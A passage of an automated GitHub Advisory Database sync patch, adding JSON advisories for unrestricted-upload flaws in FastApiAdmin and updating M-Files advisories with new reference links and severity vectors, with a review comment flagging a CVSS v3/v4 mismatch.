+ "type": "WEB",
+ "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347360"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347360"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756089"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T07:16:22Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qmq9-8xrr-rx63/GHSA-qmq9-8xrr-rx63.json b/advisories/unreviewed/2026/02/GHSA-qmq9-8xrr-rx63/GHSA-qmq9-8xrr-rx63.json
new file mode 100644
index 0000000000000..dea1054ae757e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qmq9-8xrr-rx63/GHSA-qmq9-8xrr-rx63.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qmq9-8xrr-rx63",
+ "modified": "2026-02-23T09:31:23Z",
+ "published": "2026-02-23T09:31:23Z",
+ "aliases": [
+ "CVE-2026-2978"
+ ],
+ "details": "A vulnerability was detected in FastApiAdmin up to 2.2.0. This vulnerability affects the function upload_file_controller of the file /backend/app/api/v1/module_system/params/controller.py of the component Scheduled Task API. Performing a manipulation results in unrestricted upload. The attack can be initiated remotely. The exploit is now public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2978"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347362"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347362"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756155"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T08:16:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rgpr-47mq-rh3c/GHSA-rgpr-47mq-rh3c.json b/advisories/unreviewed/2026/02/GHSA-rgpr-47mq-rh3c/GHSA-rgpr-47mq-rh3c.json
new file mode 100644
index 0000000000000..f80e802f81faa
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rgpr-47mq-rh3c/GHSA-rgpr-47mq-rh3c.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rgpr-47mq-rh3c",
+ "modified": "2026-02-23T09:31:23Z",
+ "published": "2026-02-23T09:31:23Z",
+ "aliases": [
+ "CVE-2026-2977"
+ ],
+ "details": "A security vulnerability has been detected in FastApiAdmin up to 2.2.0. This affects the function upload_controller of the file /backend/app/api/v1/module_common/file/controller.py of the component Scheduled Task API. Such manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2977"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347361"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347361"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756144"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T08:16:13Z"
+ }
+}
\ No newline at end of file
From f58705f207371ba42c78dc9d9f2a9cea89e99e01 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 12:33:20 +0000 Subject: [PATCH 52/77] Advisory Database Sync --- .../GHSA-v47f-5m37-hhcx.json | 10 +++- .../GHSA-6qxg-cm55-g85x.json | 8 ++- .../GHSA-384m-rpvv-4rw6.json | 6 +- .../GHSA-5943-48f3-6wx5.json | 8 ++- .../GHSA-88qp-7q8w-jhw6.json | 6 +- .../GHSA-vf38-34c2-p6j8.json | 6 +- .../GHSA-28pw-27gw-65v8.json | 6 +- .../GHSA-96w8-fcjx-v927.json | 10 +++- .../GHSA-9hv6-whj4-wpw5.json | 6 +- .../GHSA-c3rr-7229-8p7f.json | 6 +- .../GHSA-f74h-hvpw-9xwm.json | 6 +- .../GHSA-fwqv-682v-f9jf.json | 6 +- .../GHSA-3gmg-r977-hqcc.json | 6 +- .../GHSA-74h7-xgm8-8m8h.json | 6 +- .../GHSA-hqvw-49x7-pm7w.json | 6 +- .../GHSA-hj5f-q3p2-c2h3.json | 6 +- .../GHSA-hjj2-4jq5-9f5q.json | 6 +- .../GHSA-pc6c-whfr-9343.json | 6 +- .../GHSA-3r4h-xx4c-77cj.json | 6 +- .../GHSA-525r-jw95-mh3f.json | 6 +- .../GHSA-x6wm-h4q7-p8hv.json | 6 +- .../GHSA-29mq-c452-8pvf.json | 6 +- .../GHSA-829c-jpvx-vfrv.json | 6 +- .../GHSA-h8c5-64wc-h8mf.json | 6 +- .../GHSA-xcmx-jj38-v524.json | 6 +- .../GHSA-4v8j-92c3-9f2f.json | 6 +- .../GHSA-frg8-29h3-wvgf.json | 6 +- .../GHSA-grx8-c238-5vmr.json | 6 +- .../GHSA-hc69-r6rr-hmxf.json | 6 +- .../GHSA-2846-35pp-gqxq.json | 6 +- .../GHSA-2fpq-m96x-2xgf.json | 6 +- .../GHSA-2ww6-c8hm-gqw6.json | 36 ++++++++++++ .../GHSA-3mqj-x3cm-3wgr.json | 52 +++++++++++++++++ .../GHSA-429q-mrc4-38fr.json | 6 +- .../GHSA-4x58-j42h-46c2.json | 36 ++++++++++++ .../GHSA-c3f3-cc42-xr9v.json | 6 +- .../GHSA-c6rr-xhrp-94pr.json | 1 + .../GHSA-gj3h-r32m-qjhw.json | 1 + .../GHSA-hhvh-4rv2-p55m.json | 34 +++++++++++ .../GHSA-jm4f-crxv-97j5.json | 6 +- .../GHSA-m8cf-3mc4-cgqh.json | 56 +++++++++++++++++++ .../GHSA-qpc6-m6hf-x62g.json | 1 + .../GHSA-vwfg-jcqm-ff7v.json | 6 +- .../GHSA-wcvw-rr7p-mw54.json | 56 +++++++++++++++++++ .../GHSA-xm94-xrhg-42m4.json | 36 ++++++++++++ 45 files changed, 494 insertions(+), 37 deletions(-) create mode 100644 
advisories/unreviewed/2026/02/GHSA-2ww6-c8hm-gqw6/GHSA-2ww6-c8hm-gqw6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3mqj-x3cm-3wgr/GHSA-3mqj-x3cm-3wgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4x58-j42h-46c2/GHSA-4x58-j42h-46c2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hhvh-4rv2-p55m/GHSA-hhvh-4rv2-p55m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m8cf-3mc4-cgqh/GHSA-m8cf-3mc4-cgqh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wcvw-rr7p-mw54/GHSA-wcvw-rr7p-mw54.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xm94-xrhg-42m4/GHSA-xm94-xrhg-42m4.json
diff --git a/advisories/unreviewed/2022/05/GHSA-v47f-5m37-hhcx/GHSA-v47f-5m37-hhcx.json b/advisories/unreviewed/2022/05/GHSA-v47f-5m37-hhcx/GHSA-v47f-5m37-hhcx.json
index 046bc14b353c8..cdb012f95f4c1 100644
--- a/advisories/unreviewed/2022/05/GHSA-v47f-5m37-hhcx/GHSA-v47f-5m37-hhcx.json
+++ b/advisories/unreviewed/2022/05/GHSA-v47f-5m37-hhcx/GHSA-v47f-5m37-hhcx.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v47f-5m37-hhcx",
- "modified": "2022-05-11T00:01:56Z",
+ "modified": "2026-02-23T12:31:28Z",
 "published": "2022-05-03T00:00:36Z",
 "aliases": [
 "CVE-2021-41810"
@@ -19,6 +19,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41810"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2021-41810"
+ },
+ {
+ "type": "WEB",
+ "url": "https://product.m-files.com/security-advisories/cve-2021-41810"
+ },
 {
 "type": "WEB",
 "url": "https://www.m-files.com/about/trust-center/security-advisories/cve-2021-41810"
diff --git a/advisories/unreviewed/2023/12/GHSA-6qxg-cm55-g85x/GHSA-6qxg-cm55-g85x.json b/advisories/unreviewed/2023/12/GHSA-6qxg-cm55-g85x/GHSA-6qxg-cm55-g85x.json
index a4ed36a15fa32..6cd37d7c4678a 100644
--- a/advisories/unreviewed/2023/12/GHSA-6qxg-cm55-g85x/GHSA-6qxg-cm55-g85x.json
+++ b/advisories/unreviewed/2023/12/GHSA-6qxg-cm55-g85x/GHSA-6qxg-cm55-g85x.json
@@ -1,12 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-6qxg-cm55-g85x",
- "modified": "2024-08-28T09:30:33Z",
+ "modified": "2026-02-23T12:31:28Z",
 "published": "2023-12-20T12:30:26Z",
 "aliases": [
 "CVE-2023-6912"
 ],
- "details": "Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.\n",
+ "details": "Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.",
 "severity": [
 {
 "type": "CVSS_V3",
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6912"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2023-6912"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2023-6912"
diff --git a/advisories/unreviewed/2024/02/GHSA-384m-rpvv-4rw6/GHSA-384m-rpvv-4rw6.json b/advisories/unreviewed/2024/02/GHSA-384m-rpvv-4rw6/GHSA-384m-rpvv-4rw6.json
index 8118c7d6150c5..df2a146eb54ea 100644
--- a/advisories/unreviewed/2024/02/GHSA-384m-rpvv-4rw6/GHSA-384m-rpvv-4rw6.json
+++ b/advisories/unreviewed/2024/02/GHSA-384m-rpvv-4rw6/GHSA-384m-rpvv-4rw6.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-384m-rpvv-4rw6",
- "modified": "2025-12-23T21:30:15Z",
+ "modified": "2026-02-23T12:31:28Z",
 "published": "2024-02-23T09:30:38Z",
 "aliases": [
 "CVE-2024-0563"
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0563"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-0563"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2024-0563"
diff --git a/advisories/unreviewed/2024/04/GHSA-5943-48f3-6wx5/GHSA-5943-48f3-6wx5.json b/advisories/unreviewed/2024/04/GHSA-5943-48f3-6wx5/GHSA-5943-48f3-6wx5.json
index a5024b1a4e8f8..b25891bc29ca3 100644
--- a/advisories/unreviewed/2024/04/GHSA-5943-48f3-6wx5/GHSA-5943-48f3-6wx5.json
+++ b/advisories/unreviewed/2024/04/GHSA-5943-48f3-6wx5/GHSA-5943-48f3-6wx5.json
@@ -1,12 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5943-48f3-6wx5",
- "modified": "2024-08-27T12:30:44Z",
+ "modified": "2026-02-23T12:31:28Z",
 "published": "2024-04-26T06:30:35Z",
 "aliases": [
 "CVE-2024-4056"
 ],
- "details": "\nDenial of service condition in M-Files Server in versions before 24.4.13592.4 and after 23.11 (excluding 24.2 LTS) allows unauthenticated user to consume computing resources.\n\n",
+ "details": "Denial of service condition in M-Files Server in versions before 24.4.13592.4 and after 23.11 (excluding 24.2 LTS) allows unauthenticated user to consume computing resources.",
 "severity": [
 {
 "type": "CVSS_V3",
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4056"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-4056"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2024-4056"
diff --git a/advisories/unreviewed/2024/07/GHSA-88qp-7q8w-jhw6/GHSA-88qp-7q8w-jhw6.json b/advisories/unreviewed/2024/07/GHSA-88qp-7q8w-jhw6/GHSA-88qp-7q8w-jhw6.json
index ddab857bc5718..ade0b013597d1 100644
--- a/advisories/unreviewed/2024/07/GHSA-88qp-7q8w-jhw6/GHSA-88qp-7q8w-jhw6.json
+++ b/advisories/unreviewed/2024/07/GHSA-88qp-7q8w-jhw6/GHSA-88qp-7q8w-jhw6.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-88qp-7q8w-jhw6",
- "modified": "2024-08-27T12:30:44Z",
+ "modified": "2026-02-23T12:31:28Z",
 "published": "2024-07-29T15:30:36Z",
 "aliases": [
 "CVE-2024-6881"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6881"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-6881"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2024-6881"
diff --git a/advisories/unreviewed/2024/07/GHSA-vf38-34c2-p6j8/GHSA-vf38-34c2-p6j8.json b/advisories/unreviewed/2024/07/GHSA-vf38-34c2-p6j8/GHSA-vf38-34c2-p6j8.json
index d4b6fb379b218..2ff8e0a7f889a 100644
--- a/advisories/unreviewed/2024/07/GHSA-vf38-34c2-p6j8/GHSA-vf38-34c2-p6j8.json
+++ b/advisories/unreviewed/2024/07/GHSA-vf38-34c2-p6j8/GHSA-vf38-34c2-p6j8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vf38-34c2-p6j8",
- "modified": "2024-08-27T12:30:44Z",
+ "modified": "2026-02-23T12:31:28Z",
 "published": "2024-07-29T15:30:35Z",
 "aliases": [
 "CVE-2024-6124"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6124"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-6124"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2024-6124"
diff --git a/advisories/unreviewed/2024/08/GHSA-28pw-27gw-65v8/GHSA-28pw-27gw-65v8.json b/advisories/unreviewed/2024/08/GHSA-28pw-27gw-65v8/GHSA-28pw-27gw-65v8.json
index ae703934c4fdc..d7b305ac4b873 100644
--- a/advisories/unreviewed/2024/08/GHSA-28pw-27gw-65v8/GHSA-28pw-27gw-65v8.json
+++ b/advisories/unreviewed/2024/08/GHSA-28pw-27gw-65v8/GHSA-28pw-27gw-65v8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-28pw-27gw-65v8",
- "modified": "2024-09-07T00:31:28Z",
+ "modified": "2026-02-23T12:31:28Z",
 "published": "2024-08-27T12:30:44Z",
 "aliases": [
 "CVE-2024-6789"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6789"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-6789"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2024-6789"
diff --git a/advisories/unreviewed/2024/10/GHSA-96w8-fcjx-v927/GHSA-96w8-fcjx-v927.json b/advisories/unreviewed/2024/10/GHSA-96w8-fcjx-v927/GHSA-96w8-fcjx-v927.json
index 6e5df44a4ab1c..a51b40deb71f1 100644
--- a/advisories/unreviewed/2024/10/GHSA-96w8-fcjx-v927/GHSA-96w8-fcjx-v927.json
+++ b/advisories/unreviewed/2024/10/GHSA-96w8-fcjx-v927/GHSA-96w8-fcjx-v927.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-96w8-fcjx-v927",
- "modified": "2024-10-02T06:30:26Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2024-10-02T06:30:26Z",
 "aliases": [
 "CVE-2024-9174"
 ],
 "details": "Stored HTML Injection in Social Module in M-Files Hubshare before version 5.0.8.6 allows authenticated user to spoof UI",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
@@ -19,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9174"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-9174"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2024-9174"
diff --git a/advisories/unreviewed/2024/10/GHSA-9hv6-whj4-wpw5/GHSA-9hv6-whj4-wpw5.json b/advisories/unreviewed/2024/10/GHSA-9hv6-whj4-wpw5/GHSA-9hv6-whj4-wpw5.json
index 194b0c5766cfb..5c5a2aab3a5e0 100644
--- a/advisories/unreviewed/2024/10/GHSA-9hv6-whj4-wpw5/GHSA-9hv6-whj4-wpw5.json
+++ b/advisories/unreviewed/2024/10/GHSA-9hv6-whj4-wpw5/GHSA-9hv6-whj4-wpw5.json
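Review bot: The `CVSS_V3` entry added in the first GHSA-96w8-fcjx-v927 hunk does not agree with the `CVSS_V4` entry already in the record. The v3.1 vector has `S:C/C:L/I:L`, a scope change with low confidentiality loss, while the v4.0 vector has `VC:H/VI:L` with `SC:N/SI:N`, high confidentiality loss and no subsequent-system impact. Tools that read only one of the two `severity` entries will rank this stored HTML injection differently. The sync copies upstream data, so the reconciliation belongs at the source; until then, consumers should take the higher of the two ratings.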
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9hv6-whj4-wpw5",
- "modified": "2024-10-02T06:30:27Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2024-10-02T06:30:27Z",
 "aliases": [
 "CVE-2024-9333"
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9333"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-9333"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2024-9333"
diff --git a/advisories/unreviewed/2024/11/GHSA-c3rr-7229-8p7f/GHSA-c3rr-7229-8p7f.json b/advisories/unreviewed/2024/11/GHSA-c3rr-7229-8p7f/GHSA-c3rr-7229-8p7f.json
index c1a5eb2819ed6..099e986b06ce3 100644
--- a/advisories/unreviewed/2024/11/GHSA-c3rr-7229-8p7f/GHSA-c3rr-7229-8p7f.json
+++ b/advisories/unreviewed/2024/11/GHSA-c3rr-7229-8p7f/GHSA-c3rr-7229-8p7f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c3rr-7229-8p7f",
- "modified": "2025-10-29T15:31:50Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2024-11-20T09:32:54Z",
 "aliases": [
 "CVE-2024-10127"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10127"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-10127"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/CVE-2024-10127"
diff --git a/advisories/unreviewed/2024/11/GHSA-f74h-hvpw-9xwm/GHSA-f74h-hvpw-9xwm.json b/advisories/unreviewed/2024/11/GHSA-f74h-hvpw-9xwm/GHSA-f74h-hvpw-9xwm.json
index 70b18fa5964be..5d5af848e525c 100644
--- a/advisories/unreviewed/2024/11/GHSA-f74h-hvpw-9xwm/GHSA-f74h-hvpw-9xwm.json
+++ b/advisories/unreviewed/2024/11/GHSA-f74h-hvpw-9xwm/GHSA-f74h-hvpw-9xwm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f74h-hvpw-9xwm",
- "modified": "2025-11-20T18:30:59Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2024-11-20T09:32:54Z",
 "aliases": [
 "CVE-2024-10126"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10126"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-10126"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/CVE-2024-10126"
diff --git a/advisories/unreviewed/2024/11/GHSA-fwqv-682v-f9jf/GHSA-fwqv-682v-f9jf.json b/advisories/unreviewed/2024/11/GHSA-fwqv-682v-f9jf/GHSA-fwqv-682v-f9jf.json
index 91e9f3fbe46db..3ff372b66a22f 100644
--- a/advisories/unreviewed/2024/11/GHSA-fwqv-682v-f9jf/GHSA-fwqv-682v-f9jf.json
+++ b/advisories/unreviewed/2024/11/GHSA-fwqv-682v-f9jf/GHSA-fwqv-682v-f9jf.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fwqv-682v-f9jf",
- "modified": "2024-11-20T09:32:55Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2024-11-20T09:32:55Z",
 "aliases": [
 "CVE-2024-11176"
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11176"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2024-11176"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/CVE-2024-11176"
diff --git a/advisories/unreviewed/2025/01/GHSA-3gmg-r977-hqcc/GHSA-3gmg-r977-hqcc.json b/advisories/unreviewed/2025/01/GHSA-3gmg-r977-hqcc/GHSA-3gmg-r977-hqcc.json
index dc40b9edee152..8a04b1762fa23 100644
--- a/advisories/unreviewed/2025/01/GHSA-3gmg-r977-hqcc/GHSA-3gmg-r977-hqcc.json
+++ b/advisories/unreviewed/2025/01/GHSA-3gmg-r977-hqcc/GHSA-3gmg-r977-hqcc.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3gmg-r977-hqcc",
- "modified": "2025-10-03T15:31:14Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-01-23T12:32:36Z",
 "aliases": [
 "CVE-2025-0648"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0648"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-0648"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-0648"
diff --git a/advisories/unreviewed/2025/01/GHSA-74h7-xgm8-8m8h/GHSA-74h7-xgm8-8m8h.json b/advisories/unreviewed/2025/01/GHSA-74h7-xgm8-8m8h/GHSA-74h7-xgm8-8m8h.json
index 475041f1a2759..543d14dcccf0f 100644
--- a/advisories/unreviewed/2025/01/GHSA-74h7-xgm8-8m8h/GHSA-74h7-xgm8-8m8h.json
+++ b/advisories/unreviewed/2025/01/GHSA-74h7-xgm8-8m8h/GHSA-74h7-xgm8-8m8h.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-74h7-xgm8-8m8h",
- "modified": "2025-10-03T00:31:00Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-01-23T12:32:36Z",
 "aliases": [
 "CVE-2025-0635"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0635"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-0635"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-0635"
diff --git a/advisories/unreviewed/2025/01/GHSA-hqvw-49x7-pm7w/GHSA-hqvw-49x7-pm7w.json b/advisories/unreviewed/2025/01/GHSA-hqvw-49x7-pm7w/GHSA-hqvw-49x7-pm7w.json
index 84f19249ae9f7..f39e8dd98fccb 100644
--- a/advisories/unreviewed/2025/01/GHSA-hqvw-49x7-pm7w/GHSA-hqvw-49x7-pm7w.json
+++ b/advisories/unreviewed/2025/01/GHSA-hqvw-49x7-pm7w/GHSA-hqvw-49x7-pm7w.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hqvw-49x7-pm7w",
- "modified": "2025-10-03T00:31:00Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-01-23T12:32:35Z",
 "aliases": [
 "CVE-2025-0619"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0619"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-0619"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-0619"
diff --git a/advisories/unreviewed/2025/04/GHSA-hj5f-q3p2-c2h3/GHSA-hj5f-q3p2-c2h3.json b/advisories/unreviewed/2025/04/GHSA-hj5f-q3p2-c2h3/GHSA-hj5f-q3p2-c2h3.json
index 6d82b23f5dc1f..6f09145190554 100644
--- a/advisories/unreviewed/2025/04/GHSA-hj5f-q3p2-c2h3/GHSA-hj5f-q3p2-c2h3.json
+++ b/advisories/unreviewed/2025/04/GHSA-hj5f-q3p2-c2h3/GHSA-hj5f-q3p2-c2h3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hj5f-q3p2-c2h3",
- "modified": "2025-10-01T00:30:17Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-04-04T09:30:32Z",
 "aliases": [
 "CVE-2025-3086"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3086"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-3086"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-3086"
diff --git a/advisories/unreviewed/2025/04/GHSA-hjj2-4jq5-9f5q/GHSA-hjj2-4jq5-9f5q.json b/advisories/unreviewed/2025/04/GHSA-hjj2-4jq5-9f5q/GHSA-hjj2-4jq5-9f5q.json
index afc9271c081f6..d04dfa96752d3 100644
--- a/advisories/unreviewed/2025/04/GHSA-hjj2-4jq5-9f5q/GHSA-hjj2-4jq5-9f5q.json
+++ b/advisories/unreviewed/2025/04/GHSA-hjj2-4jq5-9f5q/GHSA-hjj2-4jq5-9f5q.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hjj2-4jq5-9f5q",
- "modified": "2025-11-19T21:31:14Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-04-04T09:30:33Z",
 "aliases": [
 "CVE-2025-3087"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
